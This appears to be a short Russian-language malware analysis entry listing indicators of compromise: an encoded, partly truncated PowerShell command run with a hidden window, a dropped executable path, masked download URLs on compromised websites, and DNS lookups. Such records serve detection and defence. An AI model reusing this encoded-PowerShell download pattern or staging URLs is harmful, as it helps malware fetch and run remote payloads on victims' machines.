Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABHAF8AeAA2AHUAYwB4AD0AKAAnAFAAJwArACgAJwBxACcAKwAnAHYAeQAnACkAKwAoACcAZgAnACsAJwB4AG8AJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABlAG4AVgA6AFUAUwBlAHIAUABSAG8AZgBpA...
- %HOMEPATH%\tykf87m\e2d45bx\q9gej06.exe
- http://tf###ru.com.br/cgi-bin/tyKJyMWbP/
- http://ae###ilates.cl/wp-content/2SyrgP/
- http://ar###.com.br/img_b2w/ovIHk/
- http://cr###e.com.br/teste/bld/
- http://vn##l.co.kr/gnuboard/data/ppHG9pLN/
- http://er###.uhost.co.kr/stop/4044_Error_Page.html
- DNS ASK tf###ru.com.br
- DNS ASK ai####raining.cl
- DNS ASK ae###ilates.cl
- DNS ASK bl##.#orkshots.net
- DNS ASK ar###.com.br
- DNS ASK cr###e.com.br
- DNS ASK vn##l.co.kr
- DNS ASK er###.uhost.co.kr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABHAF8AeAA2AHUAYwB4AD0AKAAnAFAAJwArACgAJwBxACcAKwAnAHYAeQAnACkAKwAoACcAZgAnACsAJwB4AG8AJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABlAG4AVgA6AFUAUwBlAHIAUABSAG8AZgBpA...' (со скрытым окном)